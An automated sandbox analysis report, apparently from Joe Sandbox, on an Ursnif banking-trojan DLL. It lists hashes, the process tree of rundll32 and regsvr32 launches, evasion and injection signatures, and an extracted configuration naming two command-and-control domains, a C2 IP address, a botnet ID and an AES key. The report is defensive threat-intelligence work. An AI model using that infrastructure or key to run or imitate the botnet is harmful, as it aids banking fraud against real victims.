Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.exe

Overview

General Information

Sample Name:c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.exe (renamed file extension from exe to dll)
Analysis ID:753126
MD5:590d96a7be55240ad868ebec78ce38f2
SHA1:2aaf8acb010dfe83b808d7cc77f6821aaf44f3d2
SHA256:846a8058cda54207aebb885f99dab0eab57529eb8dd94a3d57bbde2e93c4aad4
Tags:exe
Infos:

Detection

Ursnif
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 2512 cmdline: loaddll64.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll" MD5: C676FC0263EDD17D4CE7D644B8F3FCD6)
    • conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5972 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 5932 cmdline: rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • cmd.exe (PID: 3308 cmdline: cmd /c "echo Commands" >> C:\Users\user~1\AppData\Local\Temp\AEC4.tmp MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 3828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 1716 cmdline: cmd /c "dir" >> C:\Users\user~1\AppData\Local\Temp\AEC4.tmp MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • regsvr32.exe (PID: 5952 cmdline: regsvr32.exe /s C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 5960 cmdline: rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6072 cmdline: rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,FgnfMvSNFULXZx MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 2668 cmdline: rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,KVpawdrrKTUjeZuk MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
{"c2_domain": ["https://higmon.cyou", "https://prises.cyou"], "botnet": "202208151", "aes key": "VHpr3Unea0fVqBYc", "sleep time": "1", "request time": "10", "host keep time": "2", "host shift time": "1"}
SourceRuleDescriptionAuthorStrings
Process Memory Space: loaddll64.exe PID: 2512JoeSecurity_Ursnifv4Yara detected UrsnifJoe Security
    Process Memory Space: regsvr32.exe PID: 5952JoeSecurity_Ursnifv4Yara detected UrsnifJoe Security
      Process Memory Space: rundll32.exe PID: 5932JoeSecurity_Ursnifv4Yara detected UrsnifJoe Security
        Process Memory Space: rundll32.exe PID: 5960JoeSecurity_Ursnifv4Yara detected UrsnifJoe Security
          No Sigma rule has matched
          Timestamp:192.168.2.78.8.8.860326532039637 11/24/22-10:49:03.324067
          SID:2039637
          Source Port:60326
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllReversingLabs: Detection: 21%
          Source: https://higmon.cyou/index.html7b9aAvira URL Cloud: Label: malware
          Source: https://higmon.cyou/index.htmlAvira URL Cloud: Label: malware
          Source: https://higmon.cyouAvira URL Cloud: Label: malware
          Source: https://higmon.cyou/Avira URL Cloud: Label: malware
          Source: https://prises.cyouAvira URL Cloud: Label: malware
          Source: 4.2.rundll32.exe.1c7146f2900.1.raw.unpackMalware Configuration Extractor: Ursnif {"c2_domain": ["https://higmon.cyou", "https://prises.cyou"], "botnet": "202208151", "aes key": "VHpr3Unea0fVqBYc", "sleep time": "1", "request time": "10", "host keep time": "2", "host shift time": "1"}
          Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

          Networking

          barindex
          Source: C:\Windows\System32\rundll32.exeNetwork Connect: 45.8.147.179 443Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDomain query: higmon.cyou
          Source: TrafficSnort IDS: 2039637 ET TROJAN Observed DNS Query to Ursnif Domain (higmon .cyou) 192.168.2.7:60326 -> 8.8.8.8:53
          Source: Joe Sandbox ViewASN Name: VMAGE-ASRU VMAGE-ASRU
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: loaddll64.exe, 00000000.00000002.265165048.000001FF43730000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.246608034.0000000002F40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765253557.000001C716530000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765191980.000001C71618E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.247434802.000001817DA60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://higmon.cyou
          Source: rundll32.exe, 00000004.00000002.764882863.000001C71471F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.764961178.000001C714740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://higmon.cyou/
          Source: rundll32.exe, 00000004.00000002.764961178.000001C714740000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.764723934.000001C7146DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://higmon.cyou/index.html
          Source: rundll32.exe, 00000004.00000002.764723934.000001C7146DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://higmon.cyou/index.html7b9a
          Source: rundll32.exe, 00000004.00000002.765191980.000001C71618E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://higmon.cyouhttps://prises.cyouR
          Source: loaddll64.exe, 00000000.00000002.265171862.000001FF43732000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.246612763.0000000002F42000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765260621.000001C716532000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.247438709.000001817DA62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://http://Mozilla/5.0
          Source: rundll32.exe, rundll32.exe, 00000004.00000002.765346850.00007FFE35483000.00000008.00000001.01000000.00000003.sdmp, c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllString found in binary or memory: https://my.tealiumiq.com/urest/legacy/tagcompanion/getProfile?utid=
          Source: loaddll64.exe, 00000000.00000002.265165048.000001FF43730000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.246608034.0000000002F40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765253557.000001C716530000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765191980.000001C71618E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.247434802.000001817DA60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://prises.cyou
          Source: unknownDNS traffic detected: queries for: higmon.cyou

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 2512, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5952, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5932, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5960, type: MEMORYSTR

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 2512, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5952, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5932, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5960, type: MEMORYSTR
          Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000508C0_2_000000018000508C
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180004A140_2_0000000180004A14
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180003A240_2_0000000180003A24
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800018440_2_0000000180001844
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180009C540_2_0000000180009C54
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800063440_2_0000000180006344
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800057480_2_0000000180005748
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180002B600_2_0000000180002B60
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180008D780_2_0000000180008D78
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800027D40_2_00000001800027D4
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000508C3_2_000000018000508C
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180004A143_2_0000000180004A14
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180003A243_2_0000000180003A24
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800018443_2_0000000180001844
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180009C543_2_0000000180009C54
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800063443_2_0000000180006344
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800057483_2_0000000180005748
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180002B603_2_0000000180002B60
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008D783_2_0000000180008D78
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800027D43_2_00000001800027D4
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180004A144_2_0000000180004A14
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800018444_2_0000000180001844
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000508C4_2_000000018000508C
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800063444_2_0000000180006344
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800027D44_2_00000001800027D4
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180003A244_2_0000000180003A24
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180009C544_2_0000000180009C54
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800057484_2_0000000180005748
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180002B604_2_0000000180002B60
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180008D784_2_0000000180008D78
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000508C5_2_000000018000508C
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180004A145_2_0000000180004A14
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180003A245_2_0000000180003A24
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800018445_2_0000000180001844
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180009C545_2_0000000180009C54
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800063445_2_0000000180006344
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800057485_2_0000000180005748
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180002B605_2_0000000180002B60
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180008D785_2_0000000180008D78
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800027D45_2_00000001800027D4
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180005CA4 CreateFileW,RtlInitUnicodeString,NtQueryDirectoryFile,CloseHandle,GetLastError,0_2_0000000180005CA4
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180005CA4 CreateFileW,RtlInitUnicodeString,NtQueryDirectoryFile,CloseHandle,GetLastError,3_2_0000000180005CA4
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180005CA4 CreateFileW,RtlInitUnicodeString,NtQueryDirectoryFile,CloseHandle,GetLastError,4_2_0000000180005CA4
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180005CA4 CreateFileW,RtlInitUnicodeString,NtQueryDirectoryFile,CloseHandle,GetLastError,5_2_0000000180005CA4
          Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllReversingLabs: Detection: 21%
          Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1
          Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll"
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,DllRegisterServer
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "echo Commands" >> C:\Users\user~1\AppData\Local\Temp\AEC4.tmp
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,FgnfMvSNFULXZx
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "dir" >> C:\Users\user~1\AppData\Local\Temp\AEC4.tmp
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,KVpawdrrKTUjeZuk
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1Jump to behavior
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllJump to behavior
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,DllRegisterServerJump to behavior
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,FgnfMvSNFULXZxJump to behavior
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,KVpawdrrKTUjeZukJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1Jump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "echo Commands" >> C:\Users\user~1\AppData\Local\Temp\AEC4.tmpJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "dir" >> C:\Users\user~1\AppData\Local\Temp\AEC4.tmpJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3828:120:WilError_01
          Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ManagerMui
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_01
          Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user~1\AppData\Local\Temp\AEC4.tmpJump to behavior
          Source: rundll32.exeString found in binary or memory: ine .input-group .form-control,.form-inline .input-group .input-group-addon,.form-inline .input-group .input-group-btn{width:auto}.form-inline .input-group>.form-control{width:100%}.form-inline .control-label{margin-bottom:0;vertical-align:middle}.form-inline
          Source: rundll32.exeString found in binary or memory: ,.input-group .form-control:first-child{border-top-right-radius:0;border-bottom-right-radius:0}.input-group-addon:first-child{border-right:0}.input-group-addon:last-child,.input-group-btn:first-child>.btn-group:not(:first-child)>.btn,.input-group-btn:first-chi
          Source: rundll32.exeString found in binary or memory: 0 1px 1px rgba(0,0,0,.075)}.has-error .form-control:focus{border-color:#843534;box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #ce8483}.has-error .input-group-addon{color:#a94442;background-color:#f2dede;border-color:#a94442}.has-error .form-control-feedba
          Source: rundll32.exeString found in binary or memory: y:inline-block!important}}@media print{.hidden-print{display:none!important}}.ui-helper-hidden{display:none}.ui-helper-hidden-accessible{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}.ui-helper-reset{m
          Source: rundll32.exeString found in binary or memory: ble;vertical-align:middle}.navbar-form .input-group .form-control,.navbar-form .input-group .input-group-addon,.navbar-form .input-group .input-group-btn{width:auto}.navbar-form .input-group>.form-control{width:100%}.navbar-form .control-label{margin-bottom:0;
          Source: rundll32.exeString found in binary or memory: rgin:0;padding:0;border:0;outline:0;line-height:1.3;text-decoration:none;font-size:100%;list-style:none}.ui-helper-clearfix:after,.ui-helper-clearfix:before{content:"";display:table}.ui-helper-clearfix:after{clear:both}.ui-helper-clearfix{zoom:1}.ui-helper-zfi
          Source: rundll32.exeString found in binary or memory: don,.input-group-btn,.input-group .form-control{display:table-cell}.input-group-addon:not(:first-child):not(:last-child),.input-group-btn:not(:first-child):not(:last-child),.input-group .form-control:not(:first-child):not(:last-child){border-radius:0}.input-gr
          Source: rundll32.exeString found in binary or memory: images/loader.gif);background-position:50% 50%;background-repeat:no-repeat;background-size:28px auto}.wrapper{position:relative;overflow:hidden;width:100%;height:100%;min-width:320px}.content{margin:0 auto;background-color:#fff}@media only screen and (max-widt
          Source: rundll32.exeString found in binary or memory: ing:3px}.ui-terminal-input{border:0 none;background-color:transparent;color:inherit;padding:0;margin:0 0 0 2px;width:75%;outline:0;vertical-align:baseline}.ui-terminal-command{margin-left:2px;-moz-margin-start:3px}.ui-terminal-input::-ms-clear{display:none}.ui
          Source: rundll32.exeString found in binary or memory: l,select[multiple].input-group-sm>.input-group-addon,select[multiple].input-group-sm>.input-group-btn>.btn,textarea.input-group-sm>.form-control,textarea.input-group-sm>.input-group-addon,textarea.input-group-sm>.input-group-btn>.btn{height:auto}.input-group-a
          Source: rundll32.exeString found in binary or memory: cess .form-control{border-color:#3c763d;box-shadow:inset 0 1px 1px rgba(0,0,0,.075)}.has-success .form-control:focus{border-color:#2b542c;box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #67b168}.has-success .input-group-addon{color:#3c763d;background-color
          Source: rundll32.exeString found in binary or memory: :inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #c0a16b}.has-warning .input-group-addon{color:#8a6d3b;background-color:#fcf8e3;border-color:#8a6d3b}.has-warning .form-control-feedback{color:#8a6d3b}.has-error .checkbox,.has-error .checkbox-inline,.has-error.checkbox
          Source: rundll32.exeString found in binary or memory: addon.input-sm{padding:5px 10px;font-size:12px;border-radius:3px}.input-group-addon.input-lg{padding:10px 16px;font-size:18px;border-radius:6px}.input-group-addon input[type=checkbox],.input-group-addon input[type=radio]{margin-top:0}.input-group-addon:first-c
          Source: rundll32.exeString found in binary or memory: datatable .ui-column-resizer{display:block;position:absolute!important;top:0;right:0;margin:0;width:8px;height:100%;padding:0;cursor:col-resize;border:1px solid transparent}.ui-datatable .ui-column-resizer-helper{width:1px;position:absolute;z-index:10;display:
          Source: rundll32.exeString found in binary or memory: up-addon,.input-group-btn{width:1%;white-space:nowrap;vertical-align:middle}.input-group-addon{padding:6px 12px;font-size:14px;font-weight:400;line-height:1;color:#555;text-align:center;background-color:#eee;border:1px solid #ccc;border-radius:4px}.input-group
          Source: rundll32.exeString found in binary or memory: rol,select.input-group-lg>.input-group-addon,select.input-group-lg>.input-group-btn>.btn{height:46px;line-height:46px}select[multiple].input-group-lg>.form-control,select[multiple].input-group-lg>.input-group-addon,select[multiple].input-group-lg>.input-group-
          Source: rundll32.exeString found in binary or memory: -vertical .slick-slide{display:block;height:auto;border:1px solid transparent}.slick-arrow.slick-hidden{display:none}.slick-loading .slick-list{background:#fff url(../static/uploads/assets/images/loader.gif) 50% no-repeat}@font-face{font-family:slick;src:url(.
          Source: rundll32.exeString found in binary or memory: nput-group .form-control:focus{z-index:3}.input-group-lg>.form-control,.input-group-lg>.input-group-addon,.input-group-lg>.input-group-btn>.btn{height:46px;padding:10px 16px;font-size:18px;line-height:1.3333333;border-radius:6px}select.input-group-lg>.form-con
          Source: rundll32.exeString found in binary or memory: dius:0}.input-group-addon:last-child{border-left:0}.input-group-btn{font-size:0;white-space:nowrap}.input-group-btn,.input-group-btn>.btn{position:relative}.input-group-btn>.btn+.btn{margin-left:-1px}.input-group-btn>.btn:active,.input-group-btn>.btn:focus,.in
          Source: rundll32.exeString found in binary or memory: yphicon-play:before{content:"\e072"}.glyphicon-pause:before{content:"\e073"}.glyphicon-stop:before{content:"\e074"}.glyphicon-forward:before{content:"\e075"}.glyphicon-fast-forward:before{content:"\e076"}.glyphicon-step-forward:before{content:"\e077"}.glyphico
          Source: rundll32.exeString found in binary or memory: ute;top:50%;cursor:pointer}.ui-lightbox-nav-left{left:0}.ui-lightbox-nav-right{right:0}.ui-lightbox-loading{background:url(images/loading.gif) #000 50% no-repeat}.ui-lightbox-caption{padding:.2em .4em;display:none}.ui-lightbox-caption-text{margin:.3em 0 .1em;f
          Source: rundll32.exeString found in binary or memory: ;padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}select.input-group-sm>.form-control,select.input-group-sm>.input-group-addon,select.input-group-sm>.input-group-btn>.btn{height:30px;line-height:30px}select[multiple].input-group-sm>.form-contr
          Source: rundll32.exeString found in binary or memory: ay:block;width:100%}.loading{position:fixed;top:0;left:0;right:0;bottom:0;background-color:#fff;background-image:url(/static/uploads/assets/images/loader.gif);background-position:50% 50%;background-repeat:no-repeat;opacity:0;visibility:hidden;z-index:100}.load
          Source: rundll32.exeString found in binary or memory: tn>.btn,textarea.input-group-lg>.form-control,textarea.input-group-lg>.input-group-addon,textarea.input-group-lg>.input-group-btn>.btn{height:auto}.input-group-sm>.form-control,.input-group-sm>.input-group-addon,.input-group-sm>.input-group-btn>.btn{height:30p
          Source: classification engineClassification label: mal80.troj.evad.winDLL@20/1@1/1
          Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllStatic PE information: Image base 0x180000000 > 0x60000000
          Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800112EE push rax; ret 0_2_00000001800112EF
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001112F push rcx; iretd 0_2_0000000180011130
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800112EE push rax; ret 3_2_00000001800112EF
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001112F push rcx; iretd 3_2_0000000180011130
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFE354849F8 push rbx; retf 4_2_00007FFE354849F9
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800112EE push rax; ret 4_2_00000001800112EF
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001112F push rcx; iretd 4_2_0000000180011130
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800112EE push rax; ret 5_2_00000001800112EF
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001112F push rcx; iretd 5_2_0000000180011130
          Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllStatic PE information: section name: .sedt
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 2512, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5952, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5932, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5960, type: MEMORYSTR
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
